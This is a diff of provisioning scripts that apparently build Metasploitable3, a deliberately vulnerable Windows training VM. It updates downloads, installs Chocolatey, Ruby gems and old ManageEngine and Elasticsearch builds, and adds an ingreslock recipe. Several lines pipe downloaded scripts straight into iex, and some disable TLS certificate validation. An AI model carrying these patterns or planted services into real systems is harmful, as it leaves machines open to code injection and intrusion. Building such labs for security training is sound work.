+    (New-Object System.Net.WebClient).DownloadFile('https://download.microsoft.com/download/6/F/5/6F5FF66C-6775-42B0-86C4-47D41F2DA187/Win7AndW2K8R2-KB3191566-x64.zip', 'windows_pre_downloads/wmf.zip')
+} catch {
+    LogWrite $_.Exception | Format-List -force
+    LogWrite "Failed to download file."
+}

resources/download-windows-files.sh

@@ -0,0 +1,3 @@
+#!/bin/bash -e
+curl -L --output windows_pre_downloads/dotnet.exe https://download.microsoft.com/download/E/2/1/E21644B5-2DF2-47C2-91BD-63C560427900/NDP452-KB2901907-x86-x64-AllOS-ENU.exe
+curl -L --output windows_pre_downloads/wmf.zip https://download.microsoft.com/download/6/F/5/6F5FF66C-6775-42B0-86C4-47D41F2DA187/Win7AndW2K8R2-KB3191566-x64.zip

scripts/chocolatey_installs/chocolatey-compatibility.bat

@@ -0,0 +1,4 @@
+chocolatey feature enable -n=allowGlobalConfirmation
+choco install chocolatey-compatibility.extension
+chocolatey feature disable -n=allowGlobalConfirmation
+exit

scripts/configs/vagrant-ssh.bat

@@ -1,6 +0,0 @@
-:: vagrant public key
-if exist a:\vagrant.pub (
-  copy a:\vagrant.pub C:\Users\vagrant\.ssh\authorized_keys
-) else (
-  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/mitchellh/vagrant/master/keys/vagrant.pub', 'C:\Users\vagrant\.ssh\authorized_keys')" <NUL
-)

scripts/configs/vagrant-ssh.ps1

@@ -0,0 +1,56 @@
+function Invoke-CLR4PowerShellCommand {
+    [CmdletBinding()]
+    param (
+        [Parameter(Mandatory=$true)]
+        [ScriptBlock]
+        $ScriptBlock,
+        
+        [Parameter(ValueFromRemainingArguments=$true)]
+        [Alias('Args')]
+        [object[]]
+        $ArgumentList
+    )
+    
+    if ($PSVersionTable.CLRVersion.Major -eq 4) {
+        Invoke-Command -ScriptBlock $ScriptBlock -ArgumentList $ArgumentList
+        return
+    }
+
+    $RunActivationConfigPath = $Env:TEMP | Join-Path -ChildPath ([Guid]::NewGuid())
+    New-Item -Path $RunActivationConfigPath -ItemType Container | Out-Null
+@"
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+  <startup useLegacyV2RuntimeActivationPolicy="true">
+    <supportedRuntime version="v4.0"/>
+  </startup>
+</configuration>
+"@ | Set-Content -Path $RunActivationConfigPath\powershell.exe.activation_config -Encoding UTF8
+
+    $EnvVarName = 'COMPLUS_ApplicationMigrationRuntimeActivationConfigPath'
+    $EnvVarOld = [Environment]::GetEnvironmentVariable($EnvVarName)
+    [Environment]::SetEnvironmentVariable($EnvVarName, $RunActivationConfigPath)
+
+    try {
+        & powershell.exe -inputformat text -command $ScriptBlock -args $ArgumentList
+    } finally {
+        [Environment]::SetEnvironmentVariable($EnvVarName, $EnvVarOld)
+        $RunActivationConfigPath | Remove-Item -Recurse
+    }
+
+}
+
+$ErrorActionPreference = 'Stop'
+Set-StrictMode -Version Latest
+
+$isWin8 = wmic os get caption | find /i '" 8 "'
+$isWin2012 = wmic os get caption | find /i '" 2012 "'
+
+# skip wrapping for 8 or 2012?
+if ($isWin8 -or $isWin2012){
+   [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/mitchellh/vagrant/master/keys/vagrant.pub', 'C:\Users\vagrant\.ssh\authorized_keys')
+}else{
+    Invoke-CLR4PowerShellCommand -ScriptBlock {
+       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/mitchellh/vagrant/master/keys/vagrant.pub', 'C:\Users\vagrant\.ssh\authorized_keys')
+    }
+}

scripts/installs/chocolatey.cmd

@@ -1 +0,0 @@
-@powershell -NoProfile -ExecutionPolicy Bypass -File "%systemdrive%\vagrant\scripts\installs\install_chocolatey.ps1"

scripts/installs/chocolatey.ps1

@@ -0,0 +1,63 @@
+function Invoke-CLR4PowerShellCommand {
+    [CmdletBinding()]
+    param (
+        [Parameter(Mandatory=$true)]
+        [ScriptBlock]
+        $ScriptBlock,
+        
+        [Parameter(ValueFromRemainingArguments=$true)]
+        [Alias('Args')]
+        [object[]]
+        $ArgumentList
+    )
+    
+    if ($PSVersionTable.CLRVersion.Major -eq 4) {
+        Invoke-Command -ScriptBlock $ScriptBlock -ArgumentList $ArgumentList
+        return
+    }
+
+    $RunActivationConfigPath = $Env:TEMP | Join-Path -ChildPath ([Guid]::NewGuid())
+    New-Item -Path $RunActivationConfigPath -ItemType Container | Out-Null
+@"
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+  <startup useLegacyV2RuntimeActivationPolicy="true">
+    <supportedRuntime version="v4.0"/>
+  </startup>
+</configuration>
+"@ | Set-Content -Path $RunActivationConfigPath\powershell.exe.activation_config -Encoding UTF8
+
+    $EnvVarName = 'COMPLUS_ApplicationMigrationRuntimeActivationConfigPath'
+    $EnvVarOld = [Environment]::GetEnvironmentVariable($EnvVarName)
+    [Environment]::SetEnvironmentVariable($EnvVarName, $RunActivationConfigPath)
+
+    try {
+        & powershell.exe -inputformat text -command $ScriptBlock -args $ArgumentList
+    } finally {
+        [Environment]::SetEnvironmentVariable($EnvVarName, $EnvVarOld)
+        $RunActivationConfigPath | Remove-Item -Recurse
+    }
+
+}
+
+if (!(Test-Path -Path $PROFILE)) {
+  New-Item -ItemType File -Path $PROFILE -Force
+}
+
+$ErrorActionPreference = 'Stop'
+Set-StrictMode -Version Latest
+
+$isWin8 = wmic os get caption | find /i '" 8 "'
+$isWin2012 = wmic os get caption | find /i '" 2012 "'
+
+$env:chocolateyVersion = '0.10.13'
+# skip wrapping for 8 or 2012?
+if ($isWin8 -or $isWin2012){
+   [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))
+}else{
+    Invoke-CLR4PowerShellCommand -ScriptBlock {
+       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))
+    }
+}
+
+# cribbed from https://gist.github.com/jstangroome/882528

scripts/installs/install_chocolatey.ps1

@@ -1,6 +0,0 @@
-$ChocoInstallPath = "$env:SystemDrive\ProgramData\Chocolatey\bin"
-
-if (!(Test-Path $ChocoInstallPath)) {
-  [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-  iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))
-}

scripts/installs/install_devkit.bat

@@ -1,5 +1,5 @@
 mkdir "C:\RubyDevKit"
-powershell -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://dl.bintray.com/oneclick/rubyinstaller/DevKit-mingw64-64-4.7.2-20130224-1432-sfx.exe', 'C:\RubyDevKit\devkit.exe')" <NUL
+powershell -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://github.com/rapid7/metasploit-omnibus-cache/raw/7cad45e5886d0a9b3d587c86a65d66234986223a/DevKit-mingw64-64-4.7.2-20130224-1432-sfx.exe', 'C:\RubyDevKit\devkit.exe')" <NUL
 cmd /c ""C:\Program Files\7-Zip\7z.exe" x "C:\RubyDevKit\devkit.exe" -o"C:\RubyDevKit\""
 copy /Y C:\Vagrant\resources\Rails_Server\devkit\dk.rb "C:\RubyDevKit"
 C:\tools\ruby23\bin\ruby.exe "C:\RubyDevKit\dk.rb" init

scripts/installs/install_dotnet45.ps1

@@ -6,17 +6,9 @@ function LogWrite {
    Write-Host $logstring
 }
  
-LogWrite "Downloading dotNet 4.5.1"
-try {
-    (New-Object System.Net.WebClient).DownloadFile('http://download.microsoft.com/download/1/6/7/167F0D79-9317-48AE-AEDB-17120579F8E2/NDP451-KB2858728-x86-x64-AllOS-ENU.exe', 'C:\Windows\Temp\dotnet.exe')
-} catch {
-    LogWrite $_.Exception | Format-List -force
-    LogWrite "Failed to download file."
-}
-
 LogWrite "Starting installation process..."
 try {
-    Start-Process -FilePath "C:\Windows\Temp\dotnet.exe" -ArgumentList "/I /q /norestart" -Wait -PassThru
+    Start-Process -FilePath "C:\vagrant\resources\windows_pre_downloads\dotnet.exe" -ArgumentList "/I /q /norestart" -Wait -PassThru
 } catch {
     LogWrite $_.Exception | Format-List -force
     LogWrite "Exception during install process."

scripts/installs/install_elasticsearch.bat

@@ -1,4 +1,4 @@
-powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; (New-Object System.Net.WebClient).DownloadFile('http://download.elastic.co/elasticsearch/elasticsearch/elasticsearch-1.1.1.zip', 'C:\Windows\Temp\elasticsearch-1.1.1.zip')" <NUL
+powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://download.elastic.co/elasticsearch/elasticsearch/elasticsearch-1.1.1.zip', 'C:\Windows\Temp\elasticsearch-1.1.1.zip')" <NUL
 cmd /c ""C:\Program Files\7-Zip\7z.exe" x "C:\Windows\Temp\elasticsearch-1.1.1.zip" -o"C:\Program Files\""
 cmd /c ""C:\Program Files\elasticsearch-1.1.1\bin\service.bat" install"
 sc config "elasticsearch-service-x64" start= auto

scripts/installs/install_manageengine.bat

@@ -1,5 +1,5 @@
-powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://archives.manageengine.com/desktop-central/91084/ManageEngine_DesktopCentral.exe', 'C:\Windows\Temp\ManageEngine_DesktopCentral.exe')" <NUL
-start /WAIT C:\Windows\Temp\ManageEngine_DesktopCentral.exe /w /s /f1C:\Vagrant\resources\manageengine\setup.iss
+powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://metasploitable-binaries.s3.amazonaws.com/metasploitable3/ManageEngine_DesktopCentral.exe', 'C:\Windows\Temp\ManageEngine_DesktopCentral.exe')" <NUL
+start /WAIT C:\Windows\Temp\ManageEngine_DesktopCentral.exe /w /s /f1"C:\Vagrant\resources\manageengine\setup.iss"
 net stop "ManageEngine Desktop Central Server"
 net stop "MEDC Server Component - Apache"
 net stop "MEDC Server Component - Notification Server"

scripts/installs/install_netfx40.ps1

@@ -1,7 +0,0 @@
-# setup dotnetfx4
-$netfx_url = "https://download.microsoft.com/download/9/5/A/95A9616B-7A37-4AF6-BC36-D6EA96C8DAAE/dotNetFx40_Full_x86_x64.exe"
-
-Write-Output "Downloading $netfx_url"
-(New-Object System.Net.WebClient).DownloadFile($netfx_url, "C:\Windows\Temp\dotNetFx40_Full_x86_x64.exe")
-Write-Output "Starting Install of dotNetFx40_Full_x86_x64.exe"
-Start-Process "C:\Windows\Temp\dotNetFx40_Full_x86_x64.exe" "/q /norestart" -Wait

scripts/installs/install_rails_server.bat

@@ -1,30 +1,35 @@
+cmd /C echo :ssl_verify_mode: 0 > .gemrc
+cmd /C gem update --system 3.2.10
+cmd /C rm .gemrc
+
 copy /Y C:\Vagrant\resources\rails_server\gemrc C:\Users\vagrant\.gemrc
 
-cmd /C "C:\tools\ruby23\bin\gem.cmd install rails -v '4.1.1' --no-ri --no-rdoc"
-cmd /C "C:\tools\ruby23\bin\gem.cmd install rake -v '11.3.0' --no-ri --no-rdoc"
-cmd /C C:\tools\ruby23\bin\gem.cmd install coffee-script-source -v '1.10.0' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install execjs -v '2.7.0' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install hike -v '1.2.3' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install multi_json -v '1.12.1' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install tilt -v '1.4.1' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install sass -v '3.2.19' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install sqlite3 -v '1.3.11' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install turbolinks-source -v '5.0.0' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install rdoc -f -v '4.2.2' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install coffee-script -v '2.4.1' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install uglifier -v '3.0.2' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install sprockets -v '2.12.4' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install turbolinks -v '5.0.1' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install sdoc -v '0.4.2' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install tzinfo-data -v '1.2016.7' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install jbuilder -v '2.6.0' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install coffee-rails -v '4.0.1' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install jquery-rails -v '3.1.4' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install sass-rails -v '4.0.5' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install debug_inspector -v '0.0.2' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install binding_of_caller -v '0.7.2' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install web-console -v '2.1.2' --no-ri --no-rdoc
-cmd /C C:\tools\ruby23\bin\gem.cmd install minitest -v '5.9.1' --no-ri --no-rdoc
+cmd /C "C:\tools\ruby23\bin\gem.cmd install bundler -v '1.17.3' --no-document"
+cmd /C "C:\tools\ruby23\bin\gem.cmd install rails -v '4.1.1' --no-document"
+cmd /C "C:\tools\ruby23\bin\gem.cmd install rake -v '11.3.0' --no-document"
+cmd /C C:\tools\ruby23\bin\gem.cmd install coffee-script-source -v '1.10.0' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install execjs -v '2.7.0' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install hike -v '1.2.3' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install multi_json -v '1.12.1' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install tilt -v '1.4.1' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install sass -v '3.2.19' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install sqlite3 -v '1.3.11' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install turbolinks-source -v '5.0.0' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install rdoc -f -v '4.2.2' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install coffee-script -v '2.4.1' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install uglifier -v '3.0.2' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install sprockets -v '2.12.4' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install turbolinks -v '5.0.1' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install sdoc -v '0.4.2' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install tzinfo-data -v '1.2016.7' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install jbuilder -v '2.6.0' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install coffee-rails -v '4.0.1' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install jquery-rails -v '3.1.4' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install sass-rails -v '4.0.5' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install debug_inspector -v '0.0.2' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install binding_of_caller -v '0.7.2' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install web-console -v '2.1.2' --no-document
+cmd /C C:\tools\ruby23\bin\gem.cmd install minitest -v '5.9.1' --no-document
 
 copy /Y C:\Vagrant\Resources\rails_server\sqlite3-1.3.11-x64-mingw32.gemspec C:\tools\ruby23\lib\ruby\gems\2.3.0\specifications
 C:\tools\ruby23\bin\rails.bat _4.1.1_ new "C:\Program Files\Rails_Server"

scripts/installs/install_wmf.ps1

@@ -5,19 +5,31 @@ function LogWrite {
    Add-Content $Logfile -value "$now $logstring"
    Write-Host $logstring
 }
- 
-LogWrite "Downloading Windows Management Framework 5.0"
-try {
-    (New-Object System.Net.WebClient).DownloadFile('https://download.microsoft.com/download/2/C/6/2C6E1B4A-EBE5-48A6-B225-2D2058A9CEFB/Win7AndW2K8R2-KB3134760-x64.msu', 'C:\Windows\Temp\wmf.msu')
-} catch {
-    LogWrite $_.Exception | Format-List -force
-    LogWrite "Failed to download file."
+
+
+LogWrite "Extracting Archive..."
+
+$extractLocation = "C:\vagrant\resources\windows_pre_downloads\wmf_install"
+New-Item -Path $extractLocation -ItemType Directory
+
+$shell = New-Object -ComObject shell.application
+$zip = $shell.NameSpace("C:\vagrant\resources\windows_pre_downloads\wmf.zip")
+foreach ($item in $zip.items()) {
+  $shell.Namespace($extractLocation).CopyHere($item)
 }
 
+Set-Location -Path $extractLocation -PassThru
+$installCmd = "powershell.exe -ExecutionPolicy Bypass -Command " + '"' + ${extractLocation} + "\Install-WMF5.1.ps1 -AcceptEula" + '"'
+
 LogWrite "Starting installation process..."
-try {
-    Start-Process -FilePath "wusa.exe" -ArgumentList "C:\Windows\Temp\wmf.msu /quiet /norestart" -Wait -PassThru
-} catch {
-    LogWrite $_.Exception | Format-List -force
-    LogWrite "Exception during install process."
-}
+
+New-Item C:\vagrant\resources\windows_pre_downloads\wmf_install\install_wmf.bat -ItemType "file"
+Set-Content C:\vagrant\resources\windows_pre_downloads\wmf_install\install_wmf.bat $installCmd
+
+$Taskname = "updatepsh"
+
+SCHTASKS /CREATE /sc ONCE /st 00:00 /TN $Taskname /RU SYSTEM /RL HIGHEST /TR "C:\vagrant\resources\windows_pre_downloads\wmf_install\install_wmf.bat"
+schtasks /Run /TN $Taskname
+start-sleep -s 5
+schtasks /delete /tn $Taskname /f
+start-sleep -s 30

scripts/installs/setup_rails_server.bat

@@ -1,3 +1,4 @@
 copy /Y C:\Vagrant\resources\rails_server\Gemfile "C:\Program Files\Rails_Server"
 cd "C:\Program Files\Rails_Server"
-C:\tools\ruby23\bin\bundler.bat install
+gem install bundler -v '1.17.3' --no-document
+bundle install

scripts/installs/vm-guest-tools.bat

@@ -1,7 +1,7 @@
-if not exist "C:\Windows\Temp\7zInstaller-x64.msi" (
-    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://www.7-zip.org/a/7z1604-x64.msi', 'C:\Windows\Temp\7zInstaller-x64.msi')" <NUL
+if not exist "C:\Program Files\7-Zip\7z.exe" (
+    powershell -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.7-zip.org/a/7z1604-x64.msi', 'C:\Windows\Temp\7zInstaller-x64.msi')" <NUL
+    msiexec /qb /i C:\Windows\Temp\7zInstaller-x64.msi
 )
-msiexec /qb /i C:\Windows\Temp\7zInstaller-x64.msi
 
 if "%PACKER_BUILDER_TYPE%" equ "vmware-iso" goto :vmware
 if "%PACKER_BUILDER_TYPE%" equ "virtualbox-iso" goto :virtualbox
@@ -43,4 +43,6 @@ if exist "C:\Users\vagrant\prl-tools-win.iso" (
 )
 
 :done
-msiexec /qb /x C:\Windows\Temp\7zInstaller-x64.msi
+if exist "C:\Windows\Temp\7zInstaller-x64.msi" (
+    msiexec /qb /x C:\Windows\Temp\7zInstaller-x64.msi
+)

versions/pro/Vagrantfile

@@ -69,6 +69,7 @@ Vagrant.configure("2") do |config|
       chef.add_recipe "metasploitable::cups"
       chef.add_recipe "metasploitable::drupal"
       chef.add_recipe "metasploitable::knockd"
+      chef.add_recipe "metasploitable::ingreslock"
       chef.add_recipe "metasploitable::iptables"
       chef.add_recipe "metasploitable::flags"
       chef.add_recipe "metasploitable::clear_cache"